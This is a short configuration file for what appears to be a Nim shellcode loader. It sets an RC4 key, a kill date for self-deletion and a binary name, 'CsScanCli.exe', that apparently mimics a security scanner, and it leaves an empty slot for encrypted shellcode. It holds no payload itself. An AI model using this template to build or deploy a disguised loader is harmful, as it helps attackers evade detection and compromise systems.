# Edit the other variables at the top of the loader.nim file 
# Address, mutex, user agent str, execution delay time

[bin_name]
# Used by setup.py
name = "CsScanCli.exe"

[key]
rc4_key = "rcforever"

[shellcode]
# Use the ./convert <raw sc file> <key>, then paste results here
shell_code = ""

[self_delete]
# Self removal at or after this date
kill_date = "2049-01-01"